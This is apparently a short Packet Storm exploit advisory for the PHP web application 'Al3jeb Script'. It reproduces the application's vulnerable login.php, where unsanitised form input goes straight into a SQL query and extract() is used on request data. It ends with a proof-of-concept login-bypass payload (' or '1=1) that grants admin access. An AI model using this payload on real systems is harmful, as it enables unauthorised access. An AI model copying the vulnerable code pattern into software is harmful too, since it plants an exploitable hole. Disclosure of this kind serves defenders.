Al3jeb Script suffers from a remote SQL injection vulnerability that allows for authentication bypass.
65fcf686b7607a621afc107157d11cc0aa179c8c45c150521131adbaf1e7065a \#'#/
(-.-)
--------------------oOO---(_)---OOo-------------------
| al3jeb script Remote Login Bypass Exploit |
| (works only with magic_quotes_gpc = off) |
------------------------------------------------------
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Download: http://www.traidnt.net/vb/attachment.php?attachmentid=354606&d=1237376300
[!] Date: 19.01.2010
[!] Remote: yes
[!] Vulnerability Code [login.php] :
<?
session_start();
extract($_POST);
extract($_GET);
extract($_SESSION);
extract($_COOKIE);
?>
<?php
include("Connections/config.php");
if(isset($_POST['Submit']))
{
$u=$_POST["uname"];
$p=$_POST["pwd"];
$r=mysql_query("select * from admins where AdminName='$u' and AdminPass='$p'");
if($row=mysql_fetch_array($r))
{
$_SESSION['AdminName']=$u;
if(isset($re))
{
setcookie("username",$u,time()+3600);
}
header("location:index.php");
}
}
?>
[!] PoC: [al3jebscript]/login.php
username : ' or '1=1
password : cr4wl3r
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed